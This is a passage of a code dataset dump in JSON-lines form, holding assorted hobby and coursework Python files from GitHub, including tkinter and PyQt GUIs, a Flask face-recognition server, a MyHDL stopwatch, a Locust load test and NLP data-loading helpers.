9:')\nstart_game()","repo_name":"MAXHO26/SkillfactoryGame","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3462807887","text":"import tkinter as tk\nimport tkinter.messagebox as mb\n\nmainw = tk.Tk()\nmainw.title(\"Сумма положительных элементов\")\nmainw.geometry(\"250x165\")\n\nbox = tk.Listbox(mainw)\nbox.grid(row=0, column=0, rowspan=4)\n\nentry = tk.Entry(mainw)\nentry.grid(row=0, column=1)\n\nlabel = tk.Label(mainw)\nlabel.grid(row=1, column=1)\n\ndef append_item():\n box.insert('end', int(entry.get()))\n entry.delete(0, 'end')\n\ndef count_sum():\n array = []\n for item in box.get(0, 'end'):\n array.append(item)\n positive = [i for i in array if i > 0]\n summ = 0\n for item in positive:\n summ += (item)\n label['text'] = \"Сумма положительных\\nэлементов списка:\\n\" + str(summ)\n\nbuttonAdd = tk.Button(mainw, text=\"Добавить\", command=append_item)\nbuttonAdd.grid(row=2, column=1)\n\nbuttonCount = tk.Button(mainw, text=\"Посчитать\", command=count_sum)\nbuttonCount.grid(row=3, column=1)\n\nmainw.mainloop()","repo_name":"DMHYT/ComputerScience","sub_path":"10-positivesum.py","file_name":"10-positivesum.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"5823229087","text":"from PyQt5.QtCore import QRectF\nfrom PyQt5.QtGui import QColor\nfrom PyQt5.QtWidgets import QMenu, QGraphicsView\n\n## Class myview : allow us to override functions from QGraphicsView, for zoom, background and grid.\nclass myview(QGraphicsView):\n def __init__(self, Drawer, gridactivate = False): #initialisation function\n super().__init__()\n self.drawer = Drawer\n self.width = 100\n self.height = 100\n self.grid = gridactivate\n self.view_menu = QMenu(self)\n self.setTransformationAnchor(self.AnchorUnderMouse)\n self.zoom=1\n\t## Draws he grid\n def drawBackground(self, painter, rect):\n if (self.grid):\n gr = 
rect.toRect()\n start_x = gr.left() + self.width - (gr.left() % self.width)\n start_y = gr.top() + self.height - (gr.top() % self.height)\n painter.save()\n painter.setPen(QColor(60, 70, 80).lighter(90))\n painter.setOpacity(1.2)\n\n for x in range(start_x, gr.right(), self.width):\n painter.drawLine(x, gr.top(), x, gr.bottom())\n\n for y in range(start_y, gr.bottom(), self.height):\n painter.drawLine(gr.left(), y, gr.right(), y)\n painter.restore()\n self.update()\n\n #----------Zoom method-----------------\n\t## Manage the mouse wheel\n def wheelEvent(self, event):\n \"\"\"\n We can zoom in/ zoom out the GraphicsView by using wheelButton of the mouse.\n \"\"\"\n # Zoom Factor\n zoomInFactor = 1.1\n zoomOutFactor = 1 / zoomInFactor\n\n # Zoom\n if event.angleDelta().y() > 0:\n zoomFactor = zoomInFactor\n else:\n zoomFactor = zoomOutFactor\n factor = self.transform().scale(zoomFactor, zoomFactor).mapRect(QRectF(0, 0, 1, 1)).width()\n if factor < 0.15:\n return\n self.scale( zoomFactor, zoomFactor )\n self.drawer.zoom *= zoomFactor\n\t\t\n\t## Toogle the grid\n def setGrid(self, gridactivate):\n self.grid = gridactivate\n self.update()\n","repo_name":"zetechmoy/AutomataCreator","sub_path":"src/Class/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14286697902","text":"\"\"\"\nGiven a list of words, group the words by anagrams and return a list of sets of anagrams.\n\nExample:\n\n[\"cat\", \"dog\", \"god\"] = > [ {\"cat\"}, {\"dog\", \"god\"} ]\n\"\"\"\n\n\ndef group_anagrams(words):\n return get_list_anagrams_v1(words)\n\n\ndef get_list_anagrams_v2(words):\n \"\"\"\n The solution is the same as v1 but is less verbose and takes advantage of setdefault method\n \"\"\"\n anagram_groups = {}\n for word in words:\n group = anagram_groups.setdefault(\"\".join(sorted(list(word))), set([word]))\n group.add(word)\n\n return list(anagram_groups.values())\n\n\ndef get_list_anagrams_v1(words):\n anagram_groups = {}\n for word in words:\n sorted_word = \"\".join(sorted(word))\n if sorted_word in anagram_groups:\n group = anagram_groups.get(sorted_word)\n group.add(word)\n anagram_groups.update({sorted_word: group})\n else:\n anagram_groups[sorted_word] = set([word])\n\n return list(anagram_groups.values())\n","repo_name":"bonicim/technical_interviews_exposed","sub_path":"src/algorithms/blind_curated_75_leetcode_questions/group_anagrams.py","file_name":"group_anagrams.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"9008433785","text":"import random\nimport os\nimport argparse\nimport torch\nimport time\nimport pickle as pkl\nimport numpy as np\n\nfrom load_data import DataLoader\nfrom base_model import BaseModel\nfrom utils import *\nfrom config import *\nfrom base_HPO import RF_HPO\n\nparser = argparse.ArgumentParser(description=\"Parser for PRINCE\")\nparser.add_argument('--data_path', type=str, default='data/family/')\nparser.add_argument('--seed', type=int, default=1234)\nparser.add_argument('--max_epoch', type=int, default=50)\nparser.add_argument('--gpu', type=int, default=-1)\nparser.add_argument('--topk', type=int, default=-1)\nparser.add_argument('--layers', type=int, default=-1)\nparser.add_argument('--sampling', type=str, default='incremental')\nparser.add_argument('--HPO_acq', type=str, default='max')\nparser.add_argument('--weight', type=str, 
default=None)\nparser.add_argument('--tau', type=float, default=1.0)\nparser.add_argument('--loss_in_each_layer', action='store_true')\nparser.add_argument('--train', action='store_true')\nparser.add_argument('--eval', action='store_true')\nparser.add_argument('--saveWeight', action='store_true')\nparser.add_argument('--useSearchLog', action='store_true')\nparser.add_argument('--candidate', type=str, default=None)\nargs = parser.parse_args()\n\nclass Options(object):\n pass\n\nif __name__ == '__main__':\n opts = args\n # np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n dataset = args.data_path\n dataset = dataset.split('/')\n if len(dataset[-1]) > 0:\n dataset = dataset[-1]\n else:\n dataset = dataset[-2]\n torch.cuda.set_device(opts.gpu)\n print('==> gpu:', opts.gpu)\n loader = DataLoader(opts.data_path)\n opts.dataset = dataset\n opts.n_ent = loader.n_ent\n opts.n_rel = loader.n_rel\n opts.date = str(time.asctime(time.localtime(time.time())))\n \n # check all output paths\n checkPath('./results/')\n checkPath(f'./results/{dataset}/')\n checkPath(f'{loader.task_dir}/saveModel/')\n HPO_save_path = f'./results/{dataset}/search_log.pkl'\n\n def run_model(params, saveWeight=args.saveWeight, save_path=HPO_save_path, opts=opts, loader=loader):\n # params -> opts\n opts.lr = params['lr']\n opts.decay_rate = params['decay_rate']\n opts.lamb = params['lamb']\n opts.hidden_dim = params['hidden_dim']\n opts.attn_dim = params['attn_dim']\n opts.n_layer = params['n_layer']\n opts.dropout = params['dropout']\n opts.act = params['act']\n opts.MESS_FUNC = params['MESS_FUNC']\n opts.AGG_FUNC = params['AGG_FUNC']\n opts.COMB_FUNC = params['COMB_FUNC']\n opts.n_batch = params['n_batch']\n opts.n_tbatch = params['n_tbatch']\n opts.n_node_topk = [params['n_node_topk']] * params['n_layer']\n opts.n_edge_topk = params['n_edge_topk']\n\n # build model w.r.t. 
opts\n model = BaseModel(opts, loader)\n opts_str = str(opts)\n \n # train model\n best_mrr = 0\n best_test_mrr = 0\n val_eval_dict, test_eval_dict = {}, {}\n time_begin = time.time()\n for epoch in range(opts.max_epoch):\n v_mrr, v_h1, v_h10 = model.train_batch()\n val_eval_dict[epoch+1] = (v_mrr, v_h1, v_h10)\n \n if v_mrr > best_mrr:\n \n _, _, _, t_mrr, t_h1, t_h10 = model.evaluate(eval_val=False, eval_test=True)\n test_eval_dict[epoch+1] = (t_mrr, t_h1, t_h10)\n\n best_mrr, best_test_mrr = v_mrr, t_mrr\n best_str = '[VALID] MRR:%.4f H@1:%.4f H@10:%.4f\\t [TEST] MRR:%.4f H@1:%.4f H@10:%.4f \\n'%(v_mrr, v_h1, v_h10, t_mrr, t_h1, t_h10)\n print(str(epoch+1) + '\\t' + best_str)\n\n if saveWeight:\n BestMetricStr = f'ValMRR_{str(best_mrr)[:5]}'\n model.saveModelToFiles(BestMetricStr, deleteLastFile=True)\n\n # save to local file\n opts.training_time = time.time() - time_begin\n if not os.path.exists(save_path):\n HPO_records = {}\n else:\n HPO_records = pkl.load(open(save_path, 'rb'))\n HPO_records[opts_str] = (best_mrr, best_test_mrr, val_eval_dict, test_eval_dict, params, opts)\n pkl.dump(HPO_records, open(save_path, 'wb'))\n\n return best_mrr\n\n def loadSearchLog(file):\n assert os.path.exists(file)\n data = pkl.load(open(file, 'rb'))\n config_list, mrr_list = [], []\n for HP_key, HP_values in data.items():\n (best_mrr, best_test_mrr, val_eval_dict, test_eval_dict, params, opts) = HP_values\n \n # config_list.append(params)\n # mrr_list.append(best_mrr)\n for epoch, eval_res in val_eval_dict.items():\n params['epoch'] = epoch\n config_list.append(params)\n mrr_list.append(eval_res[0])\n\n print(f'==> load {len(config_list)} trials from file: {file}')\n return config_list, mrr_list\n\n \n if opts.candidate != None:\n def getNextConfig():\n data = pkl.load(open(opts.candidate, 'rb'))\n for idx in range(len(data)):\n if data[idx]['status'] == 'none':\n data[idx]['status'] = 'running'\n pkl.dump(data, open(opts.candidate, 'wb'))\n return idx, data[idx]['param']\n return -1, None\n\n while True:\n idx, param = getNextConfig()\n print(idx, param)\n if idx == -1: break\n\n try:\n run_model(param)\n except:\n continue\n\n exit()\n\n # standard HPO pipeline\n HPO_search_space['epoch'] = ('choice', [opts.max_epoch])\n HPO_instance = RF_HPO(kgeModelName='PRINCE-v1', obj_function=run_model, dataset_name=opts.dataset, HP_info=HPO_search_space, acq=opts.HPO_acq)\n \n if opts.useSearchLog:\n config_list, mrr_list = loadSearchLog(HPO_save_path)\n dataset_names = [opts.dataset for i in range(len(config_list))]\n HPO_instance.pretrain(config_list, mrr_list, dataset_names=dataset_names)\n \n max_trials, sample_num = 100, 1e4\n HPO_instance.runTrials(max_trials, sample_num, explore_trials=100)\n\n","repo_name":"moguizhizi/adaprop","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"35272821670","text":"\"\"\"Solution for Codewars problem.\n\nKyu: 4\nName: Next smaller number with the same digits\nLink: https://www.codewars.com/kata/5659c6d896bc135c4c00021e\n\"\"\"\n\n\ndef next_smaller(n):\n \"\"\"Find next smallest number using the same digits.\"\"\"\n dig_list = list(str(n))\n\n i = len(dig_list) - 2\n while i >= 0:\n # Look for possible swap (left digit is bigger than the right digit)\n if dig_list[i] > dig_list[i + 1]:\n swap_group = dig_list[i:]\n # Find best possible swap (biggest digit smaller than current digit)\n next_small = max(x for x in swap_group if 
x < dig_list[i])\n # Check for invalid swap of 0 to front of number\n if i == 0 and next_small == \"0\":\n return -1\n swap_group.remove(next_small)\n dig_list[i:] = [next_small] + sorted(swap_group, reverse=True)\n return int(\"\".join(dig_list))\n\n i -= 1\n\n return -1\n","repo_name":"Pjmcnally/algo","sub_path":"challenges/codewars/04/next_smaller.py","file_name":"next_smaller.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6860094962","text":"import myhdl\nfrom myhdl import *\n\nfrom TimeCount import TimeCount\nfrom bcd2led import bcd2led\n\ndef StopWatch(tens_led, ones_led, tenths_led, startstop, reset, clock):\n\n \"\"\" 3 digit stopwatch with seconds and tenths of a second.\n \n tens_led: 7 segment led for most significant digit of the seconds\n ones_led: 7 segment led for least significant digit of the seconds\n tenths_led: 7 segment led for tenths of a second\n startstop: input that starts or stops the stopwatch on a posedge\n reset: reset input\n clock: 10Hz clock input\n\n \"\"\"\n\n tens, ones, tenths = [Signal(intbv(0)[4:]) for i in range(3)]\n\n timecount_inst = TimeCount(tens, ones, tenths, startstop, reset, clock)\n bcd2led_tens = bcd2led(tens_led, tens, clock)\n bcd2led_ones = bcd2led(ones_led, ones, clock)\n bcd2led_tenths = bcd2led(tenths_led, tenths, clock)\n\n return timecount_inst, bcd2led_tens, bcd2led_ones, bcd2led_tenths\n\n\ndef convert():\n \n tens_led, ones_led, tenths_led = [Signal(intbv(0)[7:]) for i in range(3)]\n startstop, reset, clock = [Signal(bool(0)) for i in range(3)]\n\n toVerilog(StopWatch, tens_led, ones_led, tenths_led, startstop, reset, clock)\n conversion.analyze(StopWatch, tens_led, ones_led, tenths_led, startstop, reset, clock)\n \n\nconvert()\n \n \n \n \n \n","repo_name":"myhdl/myhdl","sub_path":"example/cookbook/stopwatch/StopWatch.py","file_name":"StopWatch.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":964,"dataset":"github-code","pt":"20"} +{"seq_id":"32700603499","text":"#takes an input between one and ten, then the first 10 values of that numbers times tables\n\nnum = int(input(\"please enter a number between one and ten\"))\nwhile num <1 or num >10:\n num = int(input(\"please enter a number between one and ten\"))\n#endwhile\ncounter = 1\n#prints the first 10 times tables for the input number\nwhile counter > 0 and counter < 11:\n print(num*counter , \",\")\n counter = counter + 1\n#endwhile\n\n## ACS Good .. 
did you mean each one to be on a separate line?","repo_name":"paolocecco/StartUpPython","sub_path":"Task 7.py","file_name":"Task 7.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73874657010","text":"from .get_birthdays import get_birthdays \n\n\ndef add_friend_user(vk, id):\n friend_list = []\n\n try:\n friends = vk.friends.get(\n user_id=id, \n fields=['sex', 'bdate', 'city', 'country']\n )['items']\n \n #sort friends by first_name\n friends = sorted(\n friends, \n key=lambda x: x['first_name'])\n except vk.exceptions.VkAPIError as e:\n print(f'Some troubles: {e.code} - {e.message}')\n return 1\n\n try:\n for friend_id in friends:\n vk_dict = {}\n\n vk_dict[\"first_name\"] = friend_id.get('first_name', '-')\n vk_dict[\"last_name\"] = friend_id.get('last_name', '-')\n vk_dict[\"country\"] = dict(friend_id.get('country', '')).get('title', '-')\n vk_dict[\"city\"] = dict(friend_id.get('city', '')).get('title', '-')\n bdate = friend_id.get('bdate', '').split('.')\n vk_dict[\"bdate\"] = get_birthdays(bdate)\n sex = friend_id.get('sex')\n vk_dict[\"sex\"] = 'male' if sex == 2 else 'female'\n \n friend_list.append(vk_dict)\n except Exception as e:\n print(f'Something went wrong adding friends to the dictionary: {e}') \n \n return friend_list\n","repo_name":"kekaiFB/vk_api","sub_path":"vkApi/add_friend_user.py","file_name":"add_friend_user.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7136842163","text":"import ast\nimport json\nimport shutil\nimport subprocess\n\nimport flask\nfrom flask import request\nfrom waitress import serve\nimport configs.config as config\nimport configs.config_api as config_api\nimport base64\nimport os\nfrom threading import Thread\nimport train\n\n\napp = flask.Flask(__name__)\n\n\ndef to_json(data):\n return json.dumps(data, ensure_ascii=False) + \"\\n\"\n\n\n\"\"\"_______________________________________________________________\n Function need to configure output response\n Input:\n 1. API status number-int\n 2. 
The returned data-any\n Output: \n flask.Response\n _______________________________________________________________\"\"\"\n\n\ndef resp(code, data):\n return flask.Response(\n status=code,\n response=data\n )\n\n\n@app.route(config_api.get_model, methods=['GET'])\ndef get_model():\n json_data = request.get_json(force=True)\n\n try:\n user_id = json_data[\"id_user\"]\n path_to_model = os.path.join(config.path_to_models, str(user_id), \"model_face.h5\")\n model_binary = open(path_to_model, \"rb\")\n model_bin = model_binary.read()\n # print(model_binary.read())\n except Exception as e:\n print(e)\n return resp(400, \"ERROR\")\n return resp(200, to_json(base64.b64encode(bytes(str(model_bin), \"utf-8\")).decode('ascii')))\n\n\n@app.route(config_api.train_model, methods=['GET'])\ndef train_model():\n json_data = request.get_json(force=True)\n user_id = json_data[0]\n main_dir = \"/Users/lashchenov/university/ТРКПО Маслаков/app_access_with_Face_Recognition/neural_network/\"\n try:\n shutil.rmtree(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}\"))\n except:\n pass\n try:\n shutil.rmtree(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}\"))\n except:\n pass\n try:\n shutil.rmtree(os.path.join(main_dir, f\"models/{user_id}\"))\n except:\n pass\n os.makedirs(os.path.join(main_dir, f\"models/{user_id}\"), 0o777)\n os.makedirs(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}\"), 0o777)\n os.makedirs(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}\"), 0o777)\n item = 1\n for train_data in json_data[1]:\n with open(os.path.join(main_dir, f\"images/{user_id}/train/{user_id}/face_{user_id}_{item}.png\"), \"wb\") as f:\n f.write(ast.literal_eval(base64.b64decode(train_data).decode()))\n item += 1\n item = 1\n for test_data in json_data[2]:\n with open(os.path.join(main_dir, f\"images/{user_id}/test/{user_id}/face_{user_id}_{item}.png\"), \"wb\") as f:\n f.write(ast.literal_eval(base64.b64decode(test_data).decode()))\n item += 1\n # os.system(\"conda activate turkin\")\n # subprocess.call([\"python\", \"train.py\", user_id])\n train_thread = Thread(target=train.train, args=(user_id,))\n train_thread.start()\n # train.train(user_id)\n return resp(200, \"success\")\n\n#\n# @app.route(config_api.face_verify, methods=['POST'])\n# def face_verify():\n# json_data = request.get_json(force=True)\n# user_id = json_data[0]\n\n\nif __name__ == \"__main__\":\n app.debug = True\n # train.train('14')\n serve(app, host=config.host, port=config.port)\n","repo_name":"elashchenov/app_face_recognition","sub_path":"neural_network/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37536303341","text":"import macleod\nimport macleod.Commands\nimport macleod.Filemgt\nimport logging\n\n\nclass Reasoner (object):\n\n MODEL_FINDER = 'MODEL_FINDER'\n\n PROVER = 'PROVER'\n\n # initialize\n def __init__(self, name, reasoner_type=None, reasoner_id=None):\n \n logging.getLogger(__name__).debug('Initializing ' + name)\n\n self.identifier = ''\n\n self.type = Reasoner.PROVER\n\n self.args = []\n\n self.input_files = ''\n\n self.output_file = ''\n\n self.ontology = ''\n\n self.time = -1\n\n self.output = None\n\n self.name = name\n\n if reasoner_type:\n self.type = reasoner_type\n if reasoner_id:\n self.identifier = reasoner_id\n else:\n self.identifier = name\n\n self.timeout = macleod.Filemgt.read_config(self.name,'timeout')\n \n 
logging.getLogger(__name__).debug('Finished initializing ' + name)\n \n\n def getId (self):\n return self.identifier\n \n def __eq__ (self, other):\n if not isinstance(other, Reasoner):\n return False\n if self.identifier == other.identifier:\n return True\n else:\n return False\n\n def __ne__ (self, other):\n return not self.eq(other)\n\n def constructCommand (self, ontology):\n import os\n \"\"\"Return the command (includes constructing it if necessary) to invoke the reasoner.\"\"\"\n self.args = macleod.Commands.get_system_command(self.name, ontology)\n\n self.ontology = ontology\n self.output_file = ontology.get_output_filename(self.name, out=True)\n logging.getLogger(__name__).info(self.name + \" writes output to \" + self.output_file)\n\n logging.getLogger(__name__).debug('Reasoner command: ' + str(self.args))\n return self.args\n\n def getCommand (self):\n return self.args\n\n def getOutputFile (self):\n return self.output_file\n\n def getOntology (self):\n return self.ontology\n\n def isProver (self):\n if self.type==Reasoner.PROVER: return True\n else: return False\n\n def terminatedSuccessfully (self):\n mapping = {\n macleod.Ontology.PROOF: True,\n macleod.Ontology.COUNTEREXAMPLE: True,\n macleod.Ontology.CONSISTENT: True,\n macleod.Ontology.INCONSISTENT: True,\n macleod.Ontology.ERROR : False,\n macleod.Ontology.UNKNOWN : False,\n None: False\n }\n\n def paradox_status(line):\n if 'Theorem' in line:\n #print \"PARADOX SZS status found: THEOREM\"\n return macleod.Ontology.PROOF\n elif 'Unsatisfiable' in line:\n return macleod.Ontology.INCONSISTENT\n elif 'CounterSatisfiable' in line:\n return macleod.Ontology.COUNTEREXAMPLE\n elif 'Satisfiable' in line:\n return macleod.Ontology.CONSISTENT\n else: # Timeout, GaveUp\n return macleod.Ontology.UNKNOWN\n\n def vampire_status(line):\n if 'Refutation not found' in line:\n return macleod.Ontology.UNKNOWN\n elif 'Refutation' in line:\n #print \"VAMPIRE SZS status found: THEOREM\"\n return macleod.Ontology.PROOF\n elif 'Unsatisfiable' in line:\n return macleod.Ontology.INCONSISTENT\n elif 'CounterSatisfiable' in line:\n return macleod.Ontology.COUNTEREXAMPLE\n elif 'Satisfiable' in line:\n return macleod.Ontology.CONSISTENT\n else: # Timeout, GaveUp\n return macleod.Ontology.UNKNOWN\n\n def success_default (self):\n return False\n\n def success_prover9 (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('THEOREM PROVED')]\n if len(output_lines)>0:\n self.output = macleod.Ontology.PROOF\n\n return mapping[self.output]\n\n\n\n def success_vampire (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('% Termination reason:')]\n l = len(output_lines)\n if l==0:\n self.output = macleod.Ontology.UNKNOWN\n # at least one line has a termination reason, so this might be an intermediate line (since Vampire in competition mode restarts several times)\n else:\n # examine the last output line\n self.output = vampire_status(output_lines[l-1])\n if self.output == macleod.Ontology.UNKNOWN:\n # Handle exceptions during parsing\n #print(str(lines))\n output_lines = [x for x in lines if x.startswith('Parser exception:')]\n if len(output_lines)>0:\n self.output = macleod.Ontology.ERROR\n\n return mapping[self.output]\n\n\n def success_paradox (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x 
in lines if x.startswith('+++ RESULT:')]\n if len(output_lines)!=1:\n output_lines = [x for x in lines if x.startswith('*** Unexpected:')]\n #print(str(lines))\n if len(output_lines)>0:\n self.output = macleod.Ontology.ERROR\n else:\n self.output = macleod.Ontology.UNKNOWN\n else:\n self.output = paradox_status(output_lines[0])\n #logging.getLogger(self.__module__ + \".\" + self.__class__.__name__).debug('Paradox terminated successfully : ' + str(self.output))\n\n return mapping[self.output]\n\n def success_mace4 (self):\n out_file = open(self.output_file, 'r')\n lines = out_file.readlines()\n out_file.close()\n output_lines = [x for x in lines if x.startswith('Exiting with 1 model.')]\n if len(output_lines)==0:\n self.output = macleod.Ontology.UNKNOWN\n else:\n self.output = macleod.Ontology.CONSISTENT\n self.output = macleod.Ontology.CONSISTENT\n\n return mapping[self.output]\n\n\n handlers = {\n \"mace4\": success_mace4,\n \"prover9\": success_prover9,\n \"paradox\": success_paradox,\n \"vampire\": success_vampire,\n }\n\n return handlers.get(self.name, success_default)(self)\n\n def terminatedWithError (self):\n # need to involve terminatedSuccessfully to make sure the self.output is set\n self.terminatedSuccessfully()\n\n if self.output==macleod.Ontology.ERROR:\n return True\n else:\n return False\n\n def terminatedUnknowingly (self):\n return not(self.terminatedSuccessfully()) and not(self.terminatedWithError())\n\n def isDone (self):\n if self.output is None:\n return False\n else:\n return True\n","repo_name":"thahmann/macleod","sub_path":"src/macleod/Reasoner.py","file_name":"Reasoner.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"20"} +{"seq_id":"36531932656","text":"# For loops\r\n\r\n\r\nfor i in range(30):\r\n print(i)\r\n\r\na={}\r\nfor i in range(30):\r\n a[i] = i\r\n\r\nprint(a)\r\n\r\n\r\n#from urllib import request as urlrequest\r\nfrom urllib import request\r\n\r\nproxy_host={'http': 'http://proxy.fisdev.local:8080'}\r\nurl='http://sixty-north.com/c/t.txt'\r\nvproxy = {'http': 'http://proxy.fisdev.local:8080', 'https': 'http://proxy.fisdev.local:8080'}\r\n#url = 'http://portal.azure.com/'\r\n\r\nurl='https://fisglobal.sharepoint.com/sites/fisandme'\r\nurl='http://www.google.com/'\r\nproxy = request.ProxyHandler(vproxy)\r\nauth = request.HTTPBasicAuthHandler()\r\nopener = request.build_opener(proxy, auth, request.HTTPHandler)\r\nrequest.install_opener(opener)\r\n\r\nstory = request.urlopen(url)\r\n\r\nprint(story)\r\nstory_words = []\r\nfor line in story:\r\n line_words = line.split()\r\n for word in line_words:\r\n story_words.append(word)\r\nstory.close()\r\nprint(story_words)","repo_name":"lboricua67/PythonV3","sub_path":"CorePythonGettingStarted/Example4-URLLIB.py","file_name":"Example4-URLLIB.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31984062636","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom locust import Locust, between, TaskSet, task, events\nimport psycopg2\nimport time\n\n\ndef create_conn():\n return psycopg2.connect(dbname='test_pg', user='admin',\n password='admin', host='localhost')\n\n\ndef execute_query(query):\n with create_conn() as conn:\n with conn.cursor() as cursor:\n cursor.execute(\n \"\"\"SELECT * FROM test_ser_prop_ts\n WHERE prop_a = 10 and prop_b = 10 \n and ts && tstzrange(NOW(), NOW() + '10 
day':: interval)\"\"\")\n records = cursor.fetchall()\n print(records)\n\n\nclass PsqlClient:\n\n def __getattr__(self, name):\n def wrapper(*args, **kwargs):\n start_time = time.time()\n try:\n res = execute_query(*args, **kwargs)\n #print('Result ----------->' + str(res.fetchone()))\n events.request_success.fire(request_type=\"psql\",\n name=name,\n response_time=int(\n (time.time() - start_time) * 1000),\n response_length=res.rowcount)\n except Exception as e:\n events.request_failure.fire(request_type=\"psql\",\n name=name,\n response_time=int(\n (time.time() - start_time) * 1000),\n exception=e)\n\n print('error {}'.format(e))\n\n return wrapper\n\n\nclass CustomTaskSet(TaskSet):\n conn_string = 'employee-metrics:employee-metrics@emp1-metrics-db-1/emp'\n\n @task(1)\n def execute_query(self):\n self.client.execute_query(\n \"select * from employees where date_of_birth like '%Jan%'\")\n\n# This class will be executed when you fire up locust\n\n\nclass PsqlLocust(Locust):\n min_wait = 0\n max_wait = 0\n task_set = CustomTaskSet\n wait_time = between(min_wait, max_wait)\n\n def __init__(self):\n super()\n self.client = PsqlClient()\n# explain analyze verbose\n# SELECT * FROM test_ser_prop_ts\n# WHERE prop_a = 10 and ts & & tstzrange(NOW(), NOW() + '10 day': : interval)\n#\n#\n# explain analyze\n# SELECT * FROM test_ser_prop_no_ts\n# WHERE prop_a = 10 and end_ts > NOW() and start_ts < NOW() + '10 day':: interval\n#\n# explain analyze verbose\n# SELECT * FROM test_ser_prop_ts\n# WHERE ts & & tstzrange(NOW(), NOW() + '10 day': : interval)\n#\n# explain analyze\n# SELECT * FROM test_ser_prop_no_ts\n# WHERE end_ts > NOW() and start_ts < NOW() + '10 day':: interval\n","repo_name":"Miktor/postgre_timestamp","sub_path":"locust/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73616206128","text":"from io import open\r\nimport torch\r\nimport re\r\nimport numpy as np\r\nimport gensim\r\nfrom torch.utils.data import Dataset\r\nfrom SA_Config import Config\r\n\r\n\r\nclass Data_set(Dataset):\r\n def __init__(self, Data, Label) -> None:\r\n super().__init__()\r\n self.Data = Data\r\n if Label is not None:\r\n self.Label = Label\r\n\r\n # 返回数据集大小\r\n def __len__(self):\r\n return len(self.Data)\r\n\r\n # 根据索引返回数据\r\n def __getitem__(self, index):\r\n if self.Label is not None:\r\n data = torch.from_numpy(self.Data[index])\r\n label = torch.from_numpy(np.array(self.Label[index]))\r\n return data, label\r\n else:\r\n data = torch.from_numpy(self.Data[index])\r\n return data\r\n\r\n# 停用词列表\r\ndef stopwordslist():\r\n stopwords = [line.strip() for line in open(\r\n Config.stop_words_path, encoding='utf-8').readlines()]\r\n return stopwords\r\n\r\n# 构建单词到id的映射文件\r\ndef build_word2id(save_to_path):\r\n \"\"\"\r\n :param save_to_path: word2id保存的文件路径\r\n :return None\r\n \"\"\"\r\n stopwords = stopwordslist()\r\n word2id = {'_PAD_': 0}\r\n path = [Config.train_path, Config.val_path]\r\n for _path in path:\r\n with open(_path, encoding='utf-8') as f:\r\n for line in f.readlines():\r\n out_list = []\r\n sp = line.strip().split()\r\n\r\n # 第0个词为标签\r\n for word in sp[1:]:\r\n if word not in stopwords:\r\n rt = re.findall('[a-zA-Z]+', word)\r\n if word != '\\t':\r\n # 忽略英文词\r\n if len(rt) == 1:\r\n continue\r\n else:\r\n out_list.append(word)\r\n\r\n # word : id 形式添加到word2id字典中\r\n for word in out_list:\r\n if word not in word2id.keys():\r\n word2id[word] = 
len(word2id)\r\n\r\n # 写入到文件中\r\n with open(save_to_path, 'w', encoding='utf-8') as f:\r\n for w in word2id:\r\n f.write(w + '\\t')\r\n f.write(str(word2id[w]))\r\n f.write('\\n')\r\n\r\n# 用word2vec预训练模型构建词向量\r\ndef build_word2vec(fname, word2id, save_to_path=None):\r\n \"\"\"\r\n :param fname: 预训练的word2vec.\r\n :param word2id: 语料文本中包含的词汇集.\r\n :param save_to_path: 保存训练语料库中的词组对应的word2vec到本地\r\n :return: 语料文本中词汇集对应的word2vec向量{id: word2vec}.\r\n \"\"\"\r\n n_words = max(word2id.values()) + 1\r\n model = gensim.models.KeyedVectors.load_word2vec_format(fname, binary=True)\r\n\r\n # word_vecs 矩阵初始化为 词典大小 * 词向��维度\r\n word2vec = np.array(np.random.uniform(-1, 1, [n_words, model.vector_size]))\r\n for word in word2id.keys():\r\n try:\r\n # 词对应的id转换成词向量\r\n word2vec[word2id[word]] = model[word]\r\n except:\r\n pass\r\n\r\n if save_to_path:\r\n with open(save_to_path, 'w', encoding='utf-8') as f:\r\n for vec in word2vec:\r\n vec = [str(w) for w in vec]\r\n f.write(' 